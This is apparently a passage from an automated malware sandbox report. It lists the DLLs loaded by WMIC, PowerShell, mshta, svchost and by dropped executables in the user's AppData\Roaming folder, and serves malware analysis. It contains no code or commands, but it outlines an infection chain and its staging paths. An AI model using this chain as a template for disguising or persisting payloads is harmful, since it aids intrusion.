                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\iScrPaint.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: version.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: webui.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: winmm.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: pla.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: pdh.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: tdh.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\iScrPaint.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: webui.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dll
